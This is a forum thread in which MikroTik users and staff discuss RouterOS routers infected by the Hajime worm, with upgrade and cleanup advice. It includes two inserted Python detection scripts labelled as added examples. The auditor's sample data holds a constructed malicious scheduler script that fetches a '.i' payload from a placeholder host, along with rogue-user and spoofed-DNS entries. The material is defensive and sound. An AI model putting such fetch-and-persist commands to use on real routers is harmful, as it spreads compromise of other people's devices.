Community discussions

 
macgaiver
Forum Guru
Posts: 1717
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 12:54 pm

@macgaiver
Isn't your proposal going hand-in-hand with the new sex trafficking law :-) ? https://www.wired.com/story/how-a-contr ... e-the-web/
I'm on the other side of the world; over here torrents and other file sharing are still at large, so some if not most of the responsibility is taken by the customer when he signs the agreement.
With great knowledge comes great responsibility, because of ability to recognize id... incompetent people much faster.
 
Filip92
just joined
Posts: 5
Joined: Fri Dec 30, 2016 6:28 pm

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:33 pm

I noticed a log entry on SXT5Lite (RouterOS v 6.34.2, 6.34.4, 6.37.1)
Mar/26/2018 23:45:13   memory      info             created new share: pub
Mar/26/2018 23:45:15   memory      info             fetch: file ".i" downloaded
and then the router starts a SYN-sent flood to dst-port 23 and 8291... the connection count is about 900-2000...

Upgrading to version 6.39.1 fixes this... Bad news: most of our clients have versions between 6.34.2 and 6.37.1 :(
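As an added example (not from the post or from MikroTik), a small Python detector that parses RouterOS log lines in the format quoted above and flags a "created new share" entry followed within a short window by the download of a dot-file such as ".i"; the benign lines around the two quoted ones in the sample are constructed.

```python
"""Flag the RouterOS log sequence reported in this thread: a 'created new share'
entry followed within seconds by a fetch of a dot-file such as ".i".
Added example, not from the post; the lines around the two quoted ones are constructed."""
import re
from datetime import datetime, timedelta

# RouterOS log line: "Mar/26/2018 23:45:13   memory      info             message"
LOG_RE = re.compile(r"^(\w{3}/\d\d/\d{4} \d\d:\d\d:\d\d)\s+(\S+)\s+(\S+)\s+(.*)$")

SAMPLE_LOG = """\
Mar/26/2018 23:40:02   system      info             dhcp lease assigned (constructed)
Mar/26/2018 23:45:13   memory      info             created new share: pub
Mar/26/2018 23:45:15   memory      info             fetch: file ".i" downloaded
Mar/26/2018 23:46:00   system      info             user admin logged in (constructed)
"""

def parse_log(text):
    """Yield (timestamp, topic, severity, message) for each well-formed log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%b/%d/%Y %H:%M:%S")
            yield ts, m.group(2), m.group(3), m.group(4)

def find_share_then_fetch(text, window=timedelta(seconds=60)):
    """Return (share_time, fetch_time, filename) for every dot-file download that
    lands within `window` of the most recent 'created new share' entry."""
    hits, last_share = [], None
    for ts, topic, _sev, msg in parse_log(text):
        if topic == "memory" and msg.startswith("created new share:"):
            last_share = ts
            continue
        m = re.match(r'fetch: file "(\.[^"]*)" downloaded', msg)
        if m and last_share is not None and ts - last_share <= window:
            hits.append((last_share, ts, m.group(1)))
    return hits
```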
 
normis
MikroTik Support
Posts: 24077
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:36 pm

Definitely try to upgrade, otherwise this thing can spread and make your problems even worse.
 
blazej44800
newbie
Posts: 31
Joined: Thu Feb 20, 2014 6:16 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 12:40 am

@normis
I've just discovered two devices; one is an RB SXT 5HnD with ROS 6.41.3, upgraded from an older version after infection. Both continue to scan for telnet; upgrading didn't solve the problem. Just generating a supout now, await it at support.
 
strods
MikroTik Support
Posts: 1406
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 7:35 am

blazej44800 - We received such an e-mail (I assume that it was you) and the upgrade had already resolved the problem. However, local RouterOS devices running old software were also already infected. After an upgrade on those devices the problem must be resolved right away.

You can check this by running Tool/Torch on your device - there you can clearly see that the traffic comes from local IP addresses, and then check whether that source IP is a router running an old RouterOS version.

At the moment we are not aware of any single case where an upgrade would not resolve the issue.
 
macgaiver
Forum Guru
Posts: 1717
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 5:26 pm

So far my testing shows that only mipsbe devices are getting exploited. Has anyone noticed other architectures affected?

Also, all of the devices actually required a reboot to get the exploit part going; from what I read here I had the idea that everything would happen straight away...
 
NathanA
Forum Veteran
Topic Author
Posts: 793
Joined: Tue Aug 03, 2004 9:01 am

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 10:49 pm

> So far my testing shows that only mipsbe devices are getting exploited. Has anyone noticed other architectures affected?
I haven't, though fully-fleshed example exploits of this vulnerability were released for both mipsbe and x86 earlier this month, and Hajime supports mipsbe, x86, and arm, so it is at least *likely* that an x86 version exists but that there simply aren't enough x86 ROS boxes out there for it to spread at the same rate. If the author simply lifted the exploits from the examples that were released, then that means it's unlikely that arm, powerpc, or tile are being infected, both because it would require some additional/original work on the author's part for arm support and also because AFAIK Hajime doesn't even have binaries for powerpc or tile at this time.
> Also, all of the devices actually required a reboot to get the exploit part going; from what I read here I had the idea that everything would happen straight away...
I'm not sure if it executes straight away or only does so after a reboot. As I implied in a prior post, I have been able, as a test, to copy the Hajime loader onto a clean device and run it manually, and it will start up and run; however it will not install the rc.d (startup) script itself, so whatever host is pushing the Hajime loader onto the device is also pushing the rc.d script onto it. If you only put the actual Hajime binary onto a device and run it, it will not automatically start up after reboot.

It's possible that the host pushing the infection is 1) copying the Hajime binary to the device, 2) copying the Hajime rc.d script to the device, and then 3) issuing a reboot command to the device, starting it that way. There is no reason why it would have to issue a reboot, though, instead of just starting up the Hajime process straight away.

-- Nathan
 
k6ccc
Member
Posts: 465
Joined: Fri May 13, 2016 12:01 am
Location: Glendora, CA, USA (near Los Angeles)

Re: RouterOS making unaccounted outbound winbox connections

Sat Mar 31, 2018 1:42 am

I use a non-standard port for all the ways into the router (including WinBox) - in addition to other things for security. I have a firewall rule that drops traffic bound for the standard ports for www, ftp, ssh, & WinBox. The real purpose of those rules is to give me packet counts since they would be dropped later anyway. Sure enough, I have been getting quite a few hits on the "normal" WinBox port 8591...
Made sure all three routers were up to date too (they were all pretty close)...
RB750Gr3, RB750r2, CRS326-24G-2S (in SwitchOS), CSS326-24G-2S, CSS106-5G-1S, RB260GS
Not sure if I beat them in submission, or they beat me into submission


Jim
 
rllavona13
just joined
Posts: 7
Joined: Mon Nov 28, 2016 12:41 am

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:29 pm

We have the same problem. I noticed the problem is in versions before 6.37; I was able to resolve it by upgrading RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything, just upgrade to the latest version and the problem is fixed. There's a worm infecting RouterOS and I guess Mikrotik doesn't know or just ignores the problem.
rllavona
Jr Network Engineer
 
pe1chl
Forum Guru
Posts: 5563
Joined: Mon Jun 08, 2015 12:09 pm

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:51 pm

> There's a worm infecting RouterOS and I guess Mikrotik doesn't know or just ignores the problem
It is actually YOU who didn't know you had to update...
If you had been on the mailing list or forum, you would have known about this for months.
It is better to keep your devices up to date so you are less likely to be affected by problems like this.
And of course configure your firewall correctly so the admin interface is not available from the internet.
 
anav
Forum Guru
Posts: 2904
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sat Aug 11, 2018 3:27 pm

> We have the same problem. I noticed the problem is in versions before 6.37; I was able to resolve it by upgrading RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything, just upgrade to the latest version and the problem is fixed. There's a worm infecting RouterOS and I guess Mikrotik doesn't know or just ignores the problem.
What?
First of all, depending upon the state and depth of the compromise a wipe and fresh install may be required. In other words, one cannot generalize your fix as a panacea for everyone else's issues.
The vulnerabilities of the Mikrotik router in past OS versions and via Winbox have been well documented and patched by Mikrotik, so I would say you are ill informed regarding their work. Logically speaking, why would they ignore the problem? It makes no sense from a technical, security or business perspective. As a purported engineer per your signature, do you really think the engineers at Mikrotik would have such an approach?? From my reading most of the issues were NOT actually POSSIBLE unless the person administering the router was incompetent (at least from a security point of view).
I'd rather manage rats than software. Follow my advice at your own risk! (Sob & mkx forced me to write that!)
 
carl0s
Frequent Visitor
Posts: 65
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:11 am

Just check in System -> Schedule.
There will be a schedule to run a script every minute that continues to allow the hackers in.
Remove the script from System -> Scripts too.
SOCKS proxy has probably been enabled; turn that off.
Check there are no new users added under System -> Users.
Change the password of the existing user.
Kill the existing connections from the IP -> Firewall -> Connections table.
Also check for NAT rules.

Obviously, if possible, restrict Winbox access too.

Oh, and yeah, upgrade RouterOS to a version that doesn't allow the whole internet to pull down the username & password table :D
 
davzar
just joined
Posts: 8
Joined: Tue Aug 09, 2016 11:20 am

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:37 pm

Another important check is:

Check if you have static entries under IP/DNS/Static.

I found a DNS A record and CNAME pointing to a fake Mikrotik download site,

maybe for downloading an altered version of RouterOS.
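As an added example (not from either post or from MikroTik), a Python script that applies the checklist from carl0s's and davzar's posts to a saved `/export` of the router: it flags an enabled SOCKS proxy, a scheduler job firing every few minutes, a script that fetches a file, users outside a known list, static DNS entries for mikrotik names, and dst-nat rules. The sample export is constructed, and placeholder.invalid and 192.0.2.10 are placeholders rather than real indicators.

```python
"""Audit a RouterOS '/export' dump against this thread's checklist (scheduler job, script,
SOCKS, added user, NAT rule, static DNS). Added example; sample export and hosts are constructed."""
import re

SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=1m name=script1 on-event=script1
/system script
add name=script1 source="/tool fetch url=\\"http://placeholder.invalid/.i\\" mode=http"
/user
add name=service group=full
/ip dns static
add address=192.0.2.10 name=download.mikrotik.com
/ip firewall nat
add chain=dstnat action=dst-nat to-addresses=192.0.2.10 dst-port=80 protocol=tcp
"""

def parse_export(text):
    """Group command lines under the '/path' heading they follow: {section: [lines]}."""
    sections, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("/"):
            current = line
        elif line and current:
            sections.setdefault(current, []).append(line)
    return sections

def short_interval(line):
    """True for scheduler entries firing every 5 minutes or less ('every minute' in the thread)."""
    m = re.search(r"interval=(\d+)([smh]?)", line)
    return bool(m) and m.group(2) in ("s", "m") and int(m.group(1)) <= 5

def unknown_user(line, known):
    m = re.search(r"name=(\S+)", line)
    return bool(m) and m.group(1) not in known

def audit(text, known_users=("admin",)):
    """Apply each check to its section; returns [(check name, offending export line)]."""
    s = parse_export(text)
    checks = [
        ("/ip socks",         "socks proxy enabled",            lambda l: "enabled=yes" in l),
        ("/system scheduler", "short-interval scheduler",       short_interval),
        ("/system script",    "script that fetches a file",     lambda l: "fetch" in l),
        ("/user",             "unexpected user",                lambda l: unknown_user(l, known_users)),
        ("/ip dns static",    "static DNS for a mikrotik name", lambda l: "mikrotik" in l.lower()),
        ("/ip firewall nat",  "dst-nat rule",                   lambda l: "action=dst-nat" in l),
    ]
    return [(name, l) for sect, name, pred in checks for l in s.get(sect, []) if pred(l)]
```

Run it against the output of `/export` saved from a suspect router; anything it flags still needs a human to decide whether the entry was put there on purpose.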
 
carl0s
Frequent Visitor
Posts: 65
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Thu Sep 20, 2018 2:16 am

> Another important check is:
>
> Check if you have static entries under IP/DNS/Static.
>
> I found a DNS A record and CNAME pointing to a fake Mikrotik download site,
>
> maybe for downloading an altered version of RouterOS.
That's a really interesting one. I hadn't thought to check that!
 
anav
Forum Guru
Posts: 2904
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sun Mar 03, 2019 11:52 pm

> Just check in System -> Schedule.
> There will be a schedule to run a script every minute that continues to allow the hackers in.
> Remove the script from System -> Scripts too.
> SOCKS proxy has probably been enabled; turn that off.
> Check there are no new users added under System -> Users.
> Change the password of the existing user.
> Kill the existing connections from the IP -> Firewall -> Connections table.
> Also check for NAT rules.
>
> Obviously, if possible, restrict Winbox access too.
>
> Oh, and yeah, upgrade RouterOS to a version that doesn't allow the whole internet to pull down the username & password table :D
Wrong wrong wrong. You cannot remove this sheite by simple means.
Stop, don't check anything, don't waste your time...........
The only approved method once infected/hacked is to use Netinstall with a fresh install of the latest firmware and start from scratch.